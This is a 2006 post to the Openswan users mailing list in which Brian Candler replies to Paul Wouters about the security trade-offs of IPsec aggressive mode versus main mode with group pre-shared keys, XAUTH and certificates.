[Openswan Users] Aggressive mode, NAT-T, destination behind NAT

Brian Candler B.Candler at pobox.com
Thu Apr 13 08:11:25 CEST 2006


On Wed, Apr 12, 2006 at 10:32:22PM +0200, Paul Wouters wrote:
> > > aggressive mode is supported, though strongly discouraged for security
> > > reasons.
...
> > When using a group pre-shared key, the fact that someone could learn that
> > the group is called "foo" is not always a major concern.
> 
> It is, because when used with PSK, anyone who knows the groupPSK can pretend
> to be your VPN gateway, and then you happilly present your XAUTH user/password
> to them.

To which I'd comment:

1. Doesn't that apply to Main Mode with PSK too?

2. With Main Mode and dynamic IP (road warrior), you have to use a single PSK
for your entire client base. With Aggressive Mode you can use a different
PSK per user or user group. So in that case, Aggressive Mode is better.

3. If you have a private key and certificate, in many cases you can still
also perform a MITM attack. (For example, with Windows clients, they do not
check that the hostname they connect to matches the one in the certificate,
so any client certificate can also be used to spoof the server)

Regards,

Brian.


More information about the Users mailing list